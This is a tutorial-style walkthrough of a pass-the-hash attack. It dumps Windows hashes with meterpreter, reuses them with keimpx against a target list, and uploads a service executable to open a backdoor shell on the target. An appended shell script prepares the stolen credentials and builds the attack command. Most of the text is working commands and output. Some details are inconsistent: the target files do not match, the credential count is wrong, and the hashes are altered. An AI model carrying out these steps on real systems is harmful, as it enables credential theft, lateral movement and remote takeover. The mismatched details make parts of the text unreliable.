control – keimpx.py pass the hash


The tool ships with BackTrack (under /pentest/passwords/keimpx); for those who want to read more, see https://github.com/inquisb/keimpx

Once you have exploited a host with Metasploit, dump the hashes with meterpreter's hashdump. Each line is in pwdump format (user:RID:LM hash:NT hash:::), and a real LM or NT hash is exactly 32 hex characters; the hash values reproduced in this post have been altered and are not valid as shown.

meterpreter > hashdump
sky:1003:aad3b435b51404eaad3b435b51404e:d0947efa7fd11f90d0947efa7fd11f90:::
admin:1032:4a3b108f3fa6cb6d4a3b108f3fa6cb6d:7ad06bdd830b7586cdd830b7586c:::
Administrator:500:eeaad3b435b51404ee:d7e0c089c0d7e0c089c0:::
ASPNET:1006:eaad3b43eaad3b435b51404ee5b51404ee:74970e7590bb5e74970e7590bb5e:::
Guest:501:51404aad3b435b5eeaad3b435b51404ee:31d6cfe0d16ae93131d6cfe0d16ae:::

AV will stop this (the shell step later on uploads a service executable into ADMIN$, which AV catches), so it is only good for the lab, sorry to say.

1. Copy the hashdump lines into gedit and save the file as hash (keimpx reads the pwdump format directly).

sky:1003:aad3b435b51404eaad3b435b51404e:d0947efa7fd11f90d0947efa7fd11f90:::
admin:1032:4a3b108f3fa6cb6d4a3b108f3fa6cb6d:7ad06bdd830b7586cdd830b7586c:::
Administrator:500:eeaad3b435b51404ee:d7e0c089c0d7e0c089c0:::
ASPNET:1006:eaad3b43eaad3b435b51404ee5b51404ee:74970e7590bb5e74970e7590bb5e:::
Guest:501:51404aad3b435b5eeaad3b435b51404ee:31d6cfe0d16ae93131d6cfe0d16ae:::

2. Create a list of target IPs in gedit, one per line, and save it.

192.168.1.1
192.168.1.2
192.168.1.48
192.168.1.52

3. Open a terminal in the keimpx directory (great program).

4. View your saved IP list.

root@bt:/pentest/passwords/keimpx# cat /root/hash/users
192.168.56.20

5. View your saved hash list.

root@bt:/pentest/passwords/keimpx# cat /root/hash/hash
sky:1003:aad3b435b51404eaad3b435b51404e:d0947efa7fd11f90d0947efa7fd11f90:::
admin:1032:4a3b108f3fa6cb6d4a3b108f3fa6cb6d:7ad06bdd830b7586cdd830b7586c:::
Administrator:500:eeaad3b435b51404ee:d7e0c089c0d7e0c089c0:::
ASPNET:1006:eaad3b43eaad3b435b51404ee5b51404ee:74970e7590bb5e74970e7590bb5e:::
Guest:501:51404aad3b435b5eeaad3b435b51404ee:31d6cfe0d16ae93131d6cfe0d16ae:::

6. keimpx options.

root@bt:/pentest/passwords/keimpx# ./keimpx.py -h
This product includes software developed by CORE Security Technologies
(http://www.coresecurity.com), Python Impacket library

keimpx 0.2
by Bernardo Damele A. G.

Usage: ./keimpx.py [options]

Options:
--version show program's version number and exit
-h, --help show this help message and exit
-v VERBOSE Verbosity level: 0-2 (default 0)
-t TARGET Target address
-l LIST File with list of targets
-U USER User
-P PASSWORD Password
--nt=NTHASH NT hash
--lm=LMHASH LM hash
-c CREDSFILE File with list of credentials
-D DOMAIN Domain
-d DOMAINSFILE File with list of domains
-p PORT SMB port: 139 or 445 (default 445)
-n NAME Local hostname
-T THREADS Maximum simultaneous connections (default 10)
-b Batch mode: do not ask to get an interactive SMB shell

7. Run keimpx with the hash file as the credentials list (-c) and the IP file as the target list (-l); -v 2 gives the debug output shown below, and -b (batch mode) skips the interactive shell prompt at the end.

root@bt:/pentest/passwords/keimpx# ./keimpx.py -c /root/hash/hash -l /root/hash/users -v 2
This product includes software developed by CORE Security Technologies
(http://www.coresecurity.com), Python Impacket library

keimpx 0.2
by Bernardo Damele A. G.

[17:19:23] [DEBUG] Using 'bt' as local hostname
[17:19:23] [INFO] Loading targets
[17:19:23] [DEBUG] Loading targets from file '/root/hash/users'
[17:19:23] [DEBUG] Parsed target '192.168.1.2:445'
[17:19:23] [INFO] Loading credentials
[17:19:23] [DEBUG] Loading credentials from file '/root/hash/hash'
[17:19:23] [DEBUG] Parsed credentials 'sky/aad3b435b51404eaad3b435b51404e:d0947efa7fd11f90d0947efa7fd11f90'
[17:19:23] [INFO] Loading domains
[17:19:23] [INFO] Loaded 1 unique targets
[17:19:23] [INFO] Loaded 9 unique credentials
[17:19:23] [INFO] No domains specified, using NULL domain
[17:19:23] [INFO] Attacking host 192.168.1.2:445
[17:19:23] [DEBUG] Connection to host 192.168.1.2:445 established
[17:19:23] [INFO] Valid credentials on 192.168.1.2:445: sky/aad3b435b51404eaad3b435b51404e:d0947efa7fd11f90d0947efa7fd11f90

[17:19:23] [INFO] Attack on host 192.168.1.2:445 finished

The credentials worked in total 1 time

TARGET SORTED RESULTS:

192.168.1.2:445
sky/aad3b435b51404eaad3b435b51404e:d0947efa7fd11f90d0947efa7fd11f90

USER SORTED RESULTS:

sky/aad3b435b51404eaad3b435b51404e:d0947efa7fd11f90d0947efa7fd11f90
192.168.1.2:445

Do you want to get a shell from any of the targets? [Y/n] y
Which target do you want to connect to?
[1] 192.168.1.2:445
> 1
Which credentials do you want to use to connect?
[1] sky/aad3b435b51404eaad3b435b51404e:d0947efa7fd11f90d0947efa7fd11f90

> 1
[17:22:31] [DEBUG] Connection to host 192.168.1.2:445 established
[17:22:31] [DEBUG] Logged in as 11
[17:22:31] [INFO] type 'help' for help menu
# help
Generic options
===============
help - show this message
verbosity {level} - set verbosity level (0-2)
info - list system information
exit - terminates the SMB session and exit from the tool

Shares options
==============
shares - list available shares
use {sharename} - connect to an specific share
cd {path} - changes the current directory to {path}
pwd - shows current remote directory
ls {path} - lists all the files in the current directory
cat {file} - display content of the selected file
download {filename} - downloads the filename from the current path
upload {filename} - uploads the filename into the current path
mkdir {dirname} - creates the directory under the current path
rm {file} - removes the selected file
rmdir {dirname} - removes the directory under the current path

Services options
================
deploy {service name} {local file} [service args] - deploy remotely a service executable
undeploy {service name} {remote file} - undeploy remotely a service executable

Shell options
=============
shell [port] - spawn a shell listening on a TCP port, by default 2090/tcp

Users options
=============
users [domain] - list users, optionally for a specific domain
pswpolicy [domain] - list password policy, optionally for a specific domain
domains - list domains to which the system is part of

Registry options (Soon)
================
regread {registry key} - read a registry key
regwrite {registry key} {registry value} - add a value to a registry key
regdelete {registry key} - delete a registry key

# shell
[17:23:40] [INFO] Uploading the service executable to 'ADMIN$\hwrkeh.exe'
[17:23:41] [INFO] Connecting to the SVCCTL named pipe
[17:23:41] [DEBUG] Binding on Services Control Manager (SCM) interface
[17:23:41] [DEBUG] Sending SVCCTL open SCM request
[17:23:41] [DEBUG] Parsing SVCCTL open SCM response
[17:23:41] [INFO] Creating the service 'LACpGG'
[17:23:41] [INFO] Starting the service 'LACpGG'
[17:23:41] [DEBUG] Disconneting from the SVCCTL named pipe
[17:23:41] [INFO] Connecting to backdoor on port 2090, wait..
Microsoft Windows XP [Version 5.1]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>
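The steps above are easy to get wrong when the hashdump has been copied by hand (a hash that is not 32 hex characters, a blank line, a user with no password). The script below is an added example, not code from the original post and not part of keimpx: it validates each pwdump line the way step 1 assumes, flags the well-known empty-password LM/NT values, writes the cleaned credentials file for -c, and prints the step 7 command line. It assumes the BackTrack path /pentest/passwords/keimpx/keimpx.py; the sample dump is constructed (the NT hash on the first line is the widely published hash of "password", the LM field is the blank-LM value), and the dropped line mimics the shortened hashes shown in this post.

```shell
#!/bin/sh
# Added example (not from the original post and not part of keimpx):
# sanity-check a meterpreter hashdump before feeding it to keimpx -c,
# then build the -c / -l files and the command line used in step 7.
# Assumption: keimpx lives at the BackTrack path below.

KEIMPX=/pentest/passwords/keimpx/keimpx.py
EMPTY_LM=aad3b435b51404eeaad3b435b51404ee   # LM hash of the empty string (LM not stored)
EMPTY_NT=31d6cfe0d16ae931b73c59d7e0c089c0   # NT hash of the empty string (blank password)

# True if the argument is exactly 32 hex characters (one LM or NT hash).
is_hex32() {
    printf '%s' "$1" | grep -Eq '^[0-9a-fA-F]{32}$'
}

# validate_pwdump_line 'user:rid:LM:NT:::'
# Prints ok, lm-disabled or empty-password for usable lines (exit 0),
# bad-format, bad-lm or bad-nt for lines keimpx cannot use (exit 1).
validate_pwdump_line() {
    user=$(printf '%s' "$1" | cut -d: -f1)
    rid=$(printf '%s' "$1" | cut -d: -f2)
    lm=$(printf '%s' "$1" | cut -d: -f3 | tr '[:upper:]' '[:lower:]')
    nt=$(printf '%s' "$1" | cut -d: -f4 | tr '[:upper:]' '[:lower:]')
    if [ -z "$user" ]; then echo bad-format; return 1; fi
    case "$rid" in ''|*[!0-9]*) echo bad-format; return 1 ;; esac
    if ! is_hex32 "$lm"; then echo bad-lm; return 1; fi
    if ! is_hex32 "$nt"; then echo bad-nt; return 1; fi
    if [ "$nt" = "$EMPTY_NT" ]; then echo empty-password; return 0; fi
    if [ "$lm" = "$EMPTY_LM" ]; then echo lm-disabled; return 0; fi
    echo ok
}

# build_keimpx_creds DUMPFILE OUTFILE
# Copies usable pwdump lines to OUTFILE, reports dropped ones on stderr,
# and prints "kept N dropped M".
build_keimpx_creds() {
    dump=$1; out=$2
    : > "$out"
    kept=0; dropped=0
    while IFS= read -r line || [ -n "$line" ]; do
        if [ -z "$line" ]; then continue; fi
        status=$(validate_pwdump_line "$line") || true
        case "$status" in
            ok|lm-disabled|empty-password)
                printf '%s\n' "$line" >> "$out"; kept=$((kept + 1)) ;;
            *)
                echo "dropping ($status): $line" >&2; dropped=$((dropped + 1)) ;;
        esac
    done < "$dump"
    echo "kept $kept dropped $dropped"
}

# keimpx_cmd CREDSFILE TARGETSFILE -> the step 7 command line
keimpx_cmd() {
    printf '%s -c %s -l %s -v 2\n' "$KEIMPX" "$1" "$2"
}

# ---- constructed sample input (not real account data) ----
SAMPLE_DUMP=$(mktemp)
cat > "$SAMPLE_DUMP" <<'EOF'
sky:1003:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
broken:1032:4a3b108f3fa6cb6d:7ad06bdd830b7586c:::
EOF
SAMPLE_TARGETS=$(mktemp)
printf '192.168.1.2\n192.168.1.48\n' > "$SAMPLE_TARGETS"

CREDS=$(mktemp)
build_keimpx_creds "$SAMPLE_DUMP" "$CREDS"     # kept 2 dropped 1
keimpx_cmd "$CREDS" "$SAMPLE_TARGETS"
```

The Guest line is kept on purpose: an empty-password NT hash is still a credential keimpx can try, and a blank LM field only means the LM hash was not stored, which does not stop NTLM authentication with the NT hash. Lines with short hashes are dropped rather than passed through, because keimpx would otherwise try to parse them as user:password pairs.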
